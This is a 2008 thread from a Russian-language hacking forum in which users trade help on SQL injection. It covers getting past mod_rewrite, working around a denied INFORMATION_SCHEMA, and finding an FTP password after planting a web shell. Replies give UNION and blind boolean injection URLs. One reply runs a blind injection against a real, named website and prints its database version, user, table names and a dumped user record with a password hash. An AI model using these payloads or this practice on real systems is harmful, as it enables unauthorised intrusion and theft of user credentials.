ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.08.2008, 10:19
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
+1
|
|
|
02.08.2008, 10:33
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
|
|
|
|
03.08.2008, 12:01
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Сообщение от Fuckel
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
а хера его обходить. Ведь меняется только текст в урле.
Вот тебе Яркий пример:
https://forum.antichat.ru/showthread.php?t=27498
и
https://forum.antichat.ru/thread27498.html
одно и тоже (обязательно прочти статью по этим линкам)
Единственное, что сложно подбирать правильный урл. Другого способа, отличного от подбора не знаю. Впринципе особо не интересовался. Погугли, может найдёшь что-нить. А если найдёшь, то скинь в личку ссылок =)
|
|
|
|
02.08.2008, 11:01
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
Если админ не хранит их в текстовике memory.txt (  ), то только надеяца, что пассы от бд или ещё чего-нибудь совпадут с фтп.
|
|
|
|
02.08.2008, 11:48
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Подскажите какие таблицы можно использовать еще, если при таком запросе:
http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--
вылазит:
SELECT command denied to user: 'user@host' for table 'table' ?
|
|
|
|
02.08.2008, 12:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от USAkid
Подскажите какие таблицы можно использовать еще, если при таком запросе:
http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--
вылазит:
SELECT command denied to user: 'user@host' for table 'table' ?
Использовать те таблицы, к которым имеет доступ юзер под которым ты подключен к бд 
к INFORMATION_SCHEMA доступа нет пробуй вручную перебирать или посредством скриптов.
|
|
|
|
02.08.2008, 14:52
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
|
|
|
|
02.08.2008, 15:22
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от satana8920
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
Объясняю раз и на всегда:
В запросе скорее всего 2 селекта
почитай это :
http://forum.antichat.ru/threadnav43966-3-10.html
|
|
|
|
02.08.2008, 15:30
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
я так понял мне надо подзапросы использовать?если да то как это осуществить?
|
|
|
|
02.08.2008, 16:39
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от satana8920
я так понял мне надо подзапросы использовать?если да то как это осуществить?
Прочитать про посимвольный перебор, а так же про подзапросы (да и про многое другое) можно здесь: https://forum.antichat.ru/threadnav43966-1-10.html
Код:
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=1 - запрос выполняется правильно, результат запроса не меняется
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=2 - запрос выполняется не правильно, результат запроса меняется
Таким образом посимвольно выводи нужную тебе информацию (для начала нужно вывести версию, т.к. подзапросы доступны начиная с версии 4.1), только делать это руками не рационально, лучше скриптом или программой:
Код:
version(): 4.1.11-Debian_4sarge7
user(): db35109_rooted@10.1.3.24
database(): db35109_x1
Т.к. версия БД => 4.1 то использовать подзапросы можно:
Код:
http://www.irintech.com/x1/blogarchive.php?id=764+and+(select+1)=1 - это уже пример подзапроса
Дальше тебе нужно брутить таблицы, могу попробывать если хочешь (т.к. я сейчас занимаюсь тестированием своего скрипта, который как раз работает со слепыми инъекциями), если найдутся какие либо (займет поиск часа 2-3), то добавлю инфу в этот же пост.
А вот и найденые таблицы:
Код:
Имена таблиц взяты из файла: lib_and_data/grey_table_name.txt
Всего: 1559 имён таблиц
Найдено таблиц: 2
admin
user
Колонки к таблице admin:
Код:
Подбор имён колонок к таблице: admin
Найдено колонок: 1
id
Колонки к таблице user:
Код:
Подбор имён колонок к таблице: user
Найдено колонок: 4
id
username
email
password
Жаль что колонки к таблице с админами не сбрутились, надо будет мне состряпать словарь с именами колонок, а то того что юзаю я пока не хватает.
Вывел данные из таблиц, может пригодится:
Код:
Вывод результата запроса: (select id from admin limit 0,1)
length((select id from admin limit 0,1)): 1
(select id from admin limit 0,1): 1
Код:
Вывод результата запроса: (select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)
length((select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1)): 45
(select concat(id,char(58),email,char(58),username,char(58),password) from user limit 0,1): 35:jean:jean:3308150413ecf9da841f9a9dd90309ba
Последний раз редактировалось Grey; 03.08.2008 в 16:19..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
